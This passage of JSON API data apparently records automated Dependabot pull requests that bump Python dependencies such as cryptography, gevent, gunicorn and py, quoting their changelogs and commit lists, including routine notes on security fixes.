href=\"https://github.com/Pylons/colander/commit/db25f7735a17c999f29545fc86d09d51508883e0\"\u003e\u003ccode\u003edb25f77\u003c/code\u003e\u003c/a\u003e prep 1.7.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Pylons/colander/commit/76ae86772c6e7d22023ecb0ffb5e3193f1a3dbd9\"\u003e\u003ccode\u003e76ae867\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/Pylons/colander/issues/322\"\u003e#322\u003c/a\u003e from Pylons/feature/Integer-strict\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Pylons/colander/commit/98805557c10ab5ff3016ed09aa2d48c49b9df40b\"\u003e\u003ccode\u003e9880555\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/Pylons/colander/issues/323\"\u003e#323\u003c/a\u003e from Pylons/fix/url-validator-dos\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Pylons/colander/commit/f22fcb9155852ca7f52bf5990a453d76d0b18204\"\u003e\u003ccode\u003ef22fcb9\u003c/code\u003e\u003c/a\u003e Add CHANGES.rst for \u003ca href=\"https://redirect.github.com/Pylons/colander/issues/322\"\u003e#322\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Pylons/colander/commit/b6fe94f97160e897144437d87a5b39ce968b1b36\"\u003e\u003ccode\u003eb6fe94f\u003c/code\u003e\u003c/a\u003e Update docstring with info about strict\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Pylons/colander/commit/08c95b8599aae14f5fa5bbe4e6ec80b96a8c8e4a\"\u003e\u003ccode\u003e08c95b8\u003c/code\u003e\u003c/a\u003e Add a strict mode to Integer\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Pylons/colander/commit/2ba8973a5fa669609fa59a3e98f64fd832036a1f\"\u003e\u003ccode\u003e2ba8973\u003c/code\u003e\u003c/a\u003e Add CHANGES.rst for \u003ca href=\"https://redirect.github.com/Pylons/colander/issues/323\"\u003e#323\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Pylons/colander/commit/0d22a9a15f4d3c615528088e033226ee284e01e0\"\u003e\u003ccode\u003e0d22a9a\u003c/code\u003e\u003c/a\u003e Add tests for file_uri validator\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Pylons/colander/commit/1a17b237fed2fdd3ac0e04ec8bfb4b206c7fe046\"\u003e\u003ccode\u003e1a17b23\u003c/code\u003e\u003c/a\u003e Add new file_uri validator\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Pylons/colander/commit/7ccafc2909bfbc5a592dc5abd944ef9960c35b35\"\u003e\u003ccode\u003e7ccafc2\u003c/code\u003e\u003c/a\u003e Update tests for url validator\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/Pylons/colander/compare/1.0...1.7.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `cryptography` from 1.1 to 44.0.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst\"\u003ecryptography's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e44.0.1 - 2025-02-11\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Updated Windows, macOS, and Linux wheels to be compiled with OpenSSL 3.4.1.\n* We now build ``armv7l`` ``manylinux`` wheels and publish them to PyPI.\n* We now build ``manylinux_2_34`` wheels and publish them to PyPI.\n\u003cp\u003e.. _v44-0-0:\u003c/p\u003e\n\u003cp\u003e44.0.0 - 2024-11-27\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBACKWARDS INCOMPATIBLE:\u003c/strong\u003e Dropped support for LibreSSL \u0026lt; 3.9.\u003c/li\u003e\n\u003cli\u003eDeprecated Python 3.7 support. Python 3.7 is no longer supported by the\nPython core team. Support for Python 3.7 will be removed in a future\n\u003ccode\u003ecryptography\u003c/code\u003e release.\u003c/li\u003e\n\u003cli\u003eUpdated Windows, macOS, and Linux wheels to be compiled with OpenSSL 3.4.0.\u003c/li\u003e\n\u003cli\u003emacOS wheels are now built against the macOS 10.13 SDK. Users on older\nversions of macOS should upgrade, or they will need to build\n\u003ccode\u003ecryptography\u003c/code\u003e themselves.\u003c/li\u003e\n\u003cli\u003eEnforce the :rfc:\u003ccode\u003e5280\u003c/code\u003e requirement that extended key usage extensions must\nnot be empty.\u003c/li\u003e\n\u003cli\u003eAdded support for timestamp extraction to the\n:class:\u003ccode\u003e~cryptography.fernet.MultiFernet\u003c/code\u003e class.\u003c/li\u003e\n\u003cli\u003eRelax the Authority Key Identifier requirements on root CA certificates\nduring X.509 verification to allow fields permitted by :rfc:\u003ccode\u003e5280\u003c/code\u003e but\nforbidden by the CA/Browser BRs.\u003c/li\u003e\n\u003cli\u003eAdded support for :class:\u003ccode\u003e~cryptography.hazmat.primitives.kdf.argon2.Argon2id\u003c/code\u003e\nwhen using OpenSSL 3.2.0+.\u003c/li\u003e\n\u003cli\u003eAdded support for the :class:\u003ccode\u003e~cryptography.x509.Admissions\u003c/code\u003e certificate extension.\u003c/li\u003e\n\u003cli\u003eAdded basic support for PKCS7 decryption (including S/MIME 3.2) via\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_der\u003c/code\u003e,\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_pem\u003c/code\u003e, and\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_smime\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _v43-0-3:\u003c/p\u003e\n\u003cp\u003e43.0.3 - 2024-10-18\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Fixed release metadata for ``cryptography-vectors``\n\u003cp\u003e.. _v43-0-2:\u003c/p\u003e\n\u003cp\u003e43.0.2 - 2024-10-18\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed compilation when using LibreSSL 4.0.0.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _v43-0-1:\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/adaaaed77db676bbaa9d171175db81dce056e2a7\"\u003e\u003ccode\u003eadaaaed\u003c/code\u003e\u003c/a\u003e Bump for 44.0.1 release (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12441\"\u003e#12441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/ccc61dabe38b86956bf218565cd4e82b918345a1\"\u003e\u003ccode\u003eccc61da\u003c/code\u003e\u003c/a\u003e [backport] test and build on armv7l (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12420\"\u003e#12420\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12431\"\u003e#12431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/f299a48153650f2dd87716343f2daa7cd39a1f59\"\u003e\u003ccode\u003ef299a48\u003c/code\u003e\u003c/a\u003e remove deprecated call (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12052\"\u003e#12052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/439eb0594a9ffb7c9adedb2490998d83914d141e\"\u003e\u003ccode\u003e439eb05\u003c/code\u003e\u003c/a\u003e Bump version for 44.0.0 (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12051\"\u003e#12051\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/2c5ad4d8dcec1b8f833198bc2f3b4634c4fd9d78\"\u003e\u003ccode\u003e2c5ad4d\u003c/code\u003e\u003c/a\u003e chore(deps): bump maturin from 1.7.4 to 1.7.5 in /.github/requirements (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12050\"\u003e#12050\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/d23968adddd79aa8508d7c1f985da09383b3808f\"\u003e\u003ccode\u003ed23968a\u003c/code\u003e\u003c/a\u003e chore(deps): bump libc from 0.2.165 to 0.2.166 (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12049\"\u003e#12049\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/133c0e02edf2f172318eb27d8f50525ed64c9ec3\"\u003e\u003ccode\u003e133c0e0\u003c/code\u003e\u003c/a\u003e Bump x509-limbo and/or wycheproof in CI (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12047\"\u003e#12047\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/f2259d7aa0d134c839ebe298baa8b63de9ead804\"\u003e\u003ccode\u003ef2259d7\u003c/code\u003e\u003c/a\u003e Bump BoringSSL and/or OpenSSL in CI (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12046\"\u003e#12046\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/e201c870b89fd2606d67230a97e50c3badb07907\"\u003e\u003ccode\u003ee201c87\u003c/code\u003e\u003c/a\u003e fixed metadata in changelog (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12044\"\u003e#12044\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/c6104cc3669585941dc1d2b9c6507621c53d242f\"\u003e\u003ccode\u003ec6104cc\u003c/code\u003e\u003c/a\u003e Prohibit Python 3.9.0, 3.9.1 -- they have a bug that causes errors (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12045\"\u003e#12045\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pyca/cryptography/compare/1.1...44.0.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `gevent` from 1.1b5 to 23.9.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/gevent/gevent/releases\"\u003egevent's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e1.2.2\u003c/h2\u003e\n\u003cp\u003eNo release notes provided.\u003c/p\u003e\n\u003ch2\u003e1.1.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePython 2: \u003ccode\u003esendall\u003c/code\u003e on a non-blocking socket could spuriously fail\nwith a timeout.\u003c/li\u003e\n\u003cli\u003eIf \u003ccode\u003esys.stderr\u003c/code\u003e has been monkey-patched (not recommended),\nexceptions that the hub reports aren't lost and can still be caught.\nReported in :issue:\u003ccode\u003e825\u003c/code\u003e by Jelle Smet.\u003c/li\u003e\n\u003cli\u003e:class:\u003ccode\u003eselectors.SelectSelector\u003c/code\u003e is properly monkey-patched\nregardless of the order of imports. Reported in :issue:\u003ccode\u003e835\u003c/code\u003e by\nPrzemysław Węgrzyn.\u003c/li\u003e\n\u003cli\u003ePython 2: \u003ccode\u003ereload(site)\u003c/code\u003e no longer fails with a \u003ccode\u003eTypeError\u003c/code\u003e if\ngevent has been imported. Reported in :issue:\u003ccode\u003e805\u003c/code\u003e by Jake Hilton.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.1.1 (Apr 4, 2016)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eNested callbacks that set and clear an Event no longer cause\n\u003ccode\u003ewait\u003c/code\u003e to return prematurely. Reported in :issue:\u003ccode\u003e771\u003c/code\u003e by Sergey\nVasilyev.\u003c/li\u003e\n\u003cli\u003eFix build on Solaris 10. Reported in :issue:\u003ccode\u003e777\u003c/code\u003e by wiggin15.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eref\u003c/code\u003e parameter to :func:\u003ccode\u003egevent.os.fork_and_watch\u003c/code\u003e was being ignored.\u003c/li\u003e\n\u003cli\u003ePython 3: :class:\u003ccode\u003egevent.queue.Channel\u003c/code\u003e is now correctly iterable, instead of\nraising a :exc:\u003ccode\u003eTypeError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ePython 3: Add support for :meth:\u003ccode\u003esocket.socket.sendmsg\u003c/code\u003e,\n:meth:\u003ccode\u003esocket.socket.recvmsg\u003c/code\u003e and :meth:\u003ccode\u003esocket.socket.recvmsg_into\u003c/code\u003e\non platforms where they are defined. Initial :pr:\u003ccode\u003e773\u003c/code\u003e by Jakub\nKlama.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.1.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePython 3: A monkey-patched :class:\u003ccode\u003ethreading.RLock\u003c/code\u003e now properly\nblocks (or deadlocks) in \u003ccode\u003eacquire\u003c/code\u003e if the default value for\n\u003cem\u003etimeout\u003c/em\u003e of -1 is used (which differs from gevent's default of\nNone). The \u003ccode\u003eacquire\u003c/code\u003e method also raises the same :exc:\u003ccode\u003eValueError\u003c/code\u003e\nexceptions that the standard library does for invalid parameters.\nReported in \u003ca href=\"https://redirect.github.com/gevent/gevent/issues/750\"\u003e#750\u003c/a\u003e by Joy Zheng.\u003c/li\u003e\n\u003cli\u003eFix a race condition in :class:\u003ccode\u003e~gevent.event.Event\u003c/code\u003e that made it\nreturn \u003ccode\u003eFalse\u003c/code\u003e when the event was set and cleared by the same\ngreenlet before allowing a switch to already waiting greenlets. (Found\nby the 3.4 and 3.5 standard library test suites; the same as Python\n\u003ccode\u003ebug 13502\u003c/code\u003e_. Note that the Python 2 standard library still has this\nrace condition.)\u003c/li\u003e\n\u003cli\u003e:class:\u003ccode\u003e~gevent.event.Event\u003c/code\u003e and :class:\u003ccode\u003e~.AsyncResult\u003c/code\u003e now wake\nwaiting greenlets in the same (unspecified) order. Previously,\n\u003ccode\u003eAsyncResult\u003c/code\u003e tended to use a FIFO order, but this was never\nguaranteed. Both classes also use less per-instance memory.\u003c/li\u003e\n\u003cli\u003eUsing a :class:\u003ccode\u003e~logging.Logger\u003c/code\u003e as a :mod:\u003ccode\u003epywsgi\u003c/code\u003e error or request\nlog stream no longer produces extra newlines. Reported in\n\u003ca href=\"https://redirect.github.com/gevent/gevent/issues/756\"\u003e#756\u003c/a\u003e by ael-code.\u003c/li\u003e\n\u003cli\u003eWindows: Installing from an sdist (.tar.gz) on PyPI no longer\nrequires having Cython installed first. (Note that the binary installation\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/gevent/gevent/blob/master/docs/changelog_1_1.rst\"\u003egevent's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e==================\nChanges for 1.1\u003c/h1\u003e\n\u003cp\u003e.. currentmodule:: gevent\u003c/p\u003e\n\u003ch1\u003e1.1.2 (Jul 21, 2016)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003ePython 2: \u003ccode\u003esendall\u003c/code\u003e on a non-blocking socket could spuriously fail\nwith a timeout.\u003c/li\u003e\n\u003cli\u003eIf \u003ccode\u003esys.stderr\u003c/code\u003e has been monkey-patched (not recommended),\nexceptions that the hub reports aren't lost and can still be caught.\nReported in :issue:\u003ccode\u003e825\u003c/code\u003e by Jelle Smet.\u003c/li\u003e\n\u003cli\u003e:class:\u003ccode\u003eselectors.SelectSelector\u003c/code\u003e is properly monkey-patched\nregardless of the order of imports. Reported in :issue:\u003ccode\u003e835\u003c/code\u003e by\nPrzemysław Węgrzyn.\u003c/li\u003e\n\u003cli\u003ePython 2: \u003ccode\u003ereload(site)\u003c/code\u003e no longer fails with a \u003ccode\u003eTypeError\u003c/code\u003e if\ngevent has been imported. Reported in :issue:\u003ccode\u003e805\u003c/code\u003e by Jake Hilton.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.1.1 (Apr 4, 2016)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eNested callbacks that set and clear an Event no longer cause\n\u003ccode\u003ewait\u003c/code\u003e to return prematurely. Reported in :issue:\u003ccode\u003e771\u003c/code\u003e by Sergey\nVasilyev.\u003c/li\u003e\n\u003cli\u003eFix build on Solaris 10. Reported in :issue:\u003ccode\u003e777\u003c/code\u003e by wiggin15.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eref\u003c/code\u003e parameter to :func:\u003ccode\u003egevent.os.fork_and_watch\u003c/code\u003e was being ignored.\u003c/li\u003e\n\u003cli\u003ePython 3: :class:\u003ccode\u003egevent.queue.Channel\u003c/code\u003e is now correctly iterable, instead of\nraising a :exc:\u003ccode\u003eTypeError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003ePython 3: Add support for :meth:\u003ccode\u003esocket.socket.sendmsg\u003c/code\u003e,\n:meth:\u003ccode\u003esocket.socket.recvmsg\u003c/code\u003e and :meth:\u003ccode\u003esocket.socket.recvmsg_into\u003c/code\u003e\non platforms where they are defined. Initial :pr:\u003ccode\u003e773\u003c/code\u003e by Jakub\nKlama.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.1.0 (Mar 5, 2016)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003ePython 3: A monkey-patched :class:\u003ccode\u003ethreading.RLock\u003c/code\u003e now properly\nblocks (or deadlocks) in \u003ccode\u003eacquire\u003c/code\u003e if the default value for\n\u003cem\u003etimeout\u003c/em\u003e of -1 is used (which differs from gevent's default of\nNone). The \u003ccode\u003eacquire\u003c/code\u003e method also raises the same :exc:\u003ccode\u003eValueError\u003c/code\u003e\nexceptions that the standard library does for invalid parameters.\nReported in :issue:\u003ccode\u003e750\u003c/code\u003e by Joy Zheng.\u003c/li\u003e\n\u003cli\u003eFix a race condition in :class:\u003ccode\u003e~gevent.event.Event\u003c/code\u003e that made it\nreturn \u003ccode\u003eFalse\u003c/code\u003e when the event was set and cleared by the same\ngreenlet before allowing a switch to already waiting greenlets. (Found\nby the 3.4 and 3.5 standard library test suites; the same as Python\n\u003ccode\u003ebug 13502\u003c/code\u003e_. Note that the Python 2 standard library still has this\nrace condition.)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/gevent/gevent/commits/23.9.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `gunicorn` from 19.2.1 to 23.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/benoitc/gunicorn/releases\"\u003egunicorn's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e23.0.0\u003c/h2\u003e\n\u003cp\u003eGunicorn 23.0.0 has been released. This version improve HTTP 1.1. support and  which improve safety\u003c/p\u003e\n\u003cp\u003eYou're invited to upgrade asap your own installation.\u003c/p\u003e\n\u003ch1\u003e23.0.0 - 2024-08-10\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eminor docs fixes (:pr:\u003ccode\u003e3217\u003c/code\u003e, :pr:\u003ccode\u003e3089\u003c/code\u003e, :pr:\u003ccode\u003e3167\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eworker_class parameter accepts a class (:pr:\u003ccode\u003e3079\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003efix deadlock if request terminated during chunked parsing (:pr:\u003ccode\u003e2688\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003epermit receiving Transfer-Encodings: compress, deflate, gzip (:pr:\u003ccode\u003e3261\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003epermit Transfer-Encoding headers specifying multiple encodings. note: no parameters, still (:pr:\u003ccode\u003e3261\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003esdist generation now explicitly excludes sphinx build folder (:pr:\u003ccode\u003e3257\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003edecode bytes-typed status (as can be passed by gevent) as utf-8 instead of raising \u003ccode\u003eTypeError\u003c/code\u003e (:pr:\u003ccode\u003e2336\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eraise correct Exception when encounting invalid chunked requests (:pr:\u003ccode\u003e3258\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003ethe SCRIPT_NAME and PATH_INFO headers, when received from allowed forwarders, are no longer restricted for containing an underscore (:pr:\u003ccode\u003e3192\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003einclude IPv6 loopback address \u003ccode\u003e[::1]\u003c/code\u003e in default for :ref:\u003ccode\u003eforwarded-allow-ips\u003c/code\u003e and :ref:\u003ccode\u003eproxy-allow-ips\u003c/code\u003e (:pr:\u003ccode\u003e3192\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e** NOTE **\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe SCRIPT_NAME change mitigates a regression that appeared first in the 22.0.0 release\u003c/li\u003e\n\u003cli\u003eReview your :ref:\u003ccode\u003eforwarded-allow-ips\u003c/code\u003e setting if you are still not seeing the SCRIPT_NAME transmitted\u003c/li\u003e\n\u003cli\u003eReview your :ref:\u003ccode\u003eforwarder-headers\u003c/code\u003e setting if you are missing headers after upgrading from a version prior to 22.0.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e** Breaking changes **\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003erefuse requests where the uri field is empty (:pr:\u003ccode\u003e3255\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003erefuse requests with invalid CR/LR/NUL in heade field values (:pr:\u003ccode\u003e3253\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eremove temporary \u003ccode\u003e--tolerate-dangerous-framing\u003c/code\u003e switch from 22.0 (:pr:\u003ccode\u003e3260\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003eIf any of the breaking changes affect you, be aware that now refused requests can post a security problem, especially so in setups involving request pipe-lining and/or proxies.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eFix CVE-2024-1135\u003c/p\u003e\n\u003ch2\u003eGunicorn 22.0 has been released\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eGunicorn 22.0.0 has been released.\u003c/strong\u003e This version fix the numerous security vulnerabilities. You're invited to upgrade asap your own installation.\u003c/p\u003e\n\u003cp\u003eChanges:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e22.0.0 - 2024-04-17\n===================\n\u003cul\u003e\n\u003cli\u003euse \u003ccode\u003eutime\u003c/code\u003e to notify workers liveness\u003c/li\u003e\n\u003cli\u003emigrate setup to pyproject.toml\u003c/li\u003e\n\u003cli\u003efix numerous security vulnerabilities in HTTP parser (closing some request smuggling vectors)\u003c/li\u003e\n\u003cli\u003eparsing additional requests is no longer attempted past unsupported request framing\u003c/li\u003e\n\u003cli\u003eon HTTP versions \u0026lt; 1.1 support for chunked transfer is refused (only used in exploits)\u003c/li\u003e\n\u003cli\u003erequests conflicting configured or passed SCRIPT_NAME now produce a verbose error\u003c/li\u003e\n\u003cli\u003eTrailer fields are no longer inspected for headers indicating secure scheme\n\u0026lt;/tr\u0026gt;\u0026lt;/table\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/411986d6191114dd1d1bbb9c72c948dbf0ef0425\"\u003e\u003ccode\u003e411986d\u003c/code\u003e\u003c/a\u003e fix doc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/334392e7795f2017e83f7054d372422512d6f4b6\"\u003e\u003ccode\u003e334392e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/benoitc/gunicorn/issues/2559\"\u003e#2559\u003c/a\u003e from laggardkernel/bugfix/reexec-env\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/e75c3533e32f91a9dceba9e8e1341fea5540ba81\"\u003e\u003ccode\u003ee75c353\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/benoitc/gunicorn/issues/3189\"\u003e#3189\u003c/a\u003e from pajod/patch-py36\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/9357b28dd867950e33ca3864207cb35a1eb8ba6f\"\u003e\u003ccode\u003e9357b28\u003c/code\u003e\u003c/a\u003e keep document user in access_log_format setting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/79fdef0822cbfe7e16b659b07230af9be098d5fc\"\u003e\u003ccode\u003e79fdef0\u003c/code\u003e\u003c/a\u003e bump to 23.0.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/com...\n\n_Description has been truncated_","html_url":"https://github.com/voolitels/ichnaea/pull/1","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/voolitels%2Fichnaea/issues/1","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1/packages"},{"uuid":"2731880369","node_id":"PR_kwDODdGf3s6i1S-x","number":24,"state":"open","title":"Bump py from 1.8.0 to 1.11.0 in /api/server/tests-py","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"CONTRIBUTOR","state_reason":null,"created_at":"2025-08-08T22:23:09.000Z","updated_at":"2025-08-08T22:23:10.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","packages":[{"name":"py","old_version":"1.8.0","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"}],"path":"/api/server/tests-py","ecosystem":"pip"},"body":"Bumps [py](https://github.com/pytest-dev/py) from 1.8.0 to 1.11.0.\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.10.0 (2020-12-12)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix a regular expression DoS vulnerability in the py.path.svnwc SVN blame functionality (CVE-2020-29651)\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.4 =\u0026gt; 1.5\u003c/li\u003e\n\u003cli\u003eUpdate vendored iniconfig: 1.0.0 =\u0026gt; 1.1.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.9.0 (2020-06-24)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd type annotation stubs for the following modules:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epy.error\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.iniconfig\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.path\u003c/code\u003e (not including SVN paths)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.io\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.xml\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThere are no plans to type other modules at this 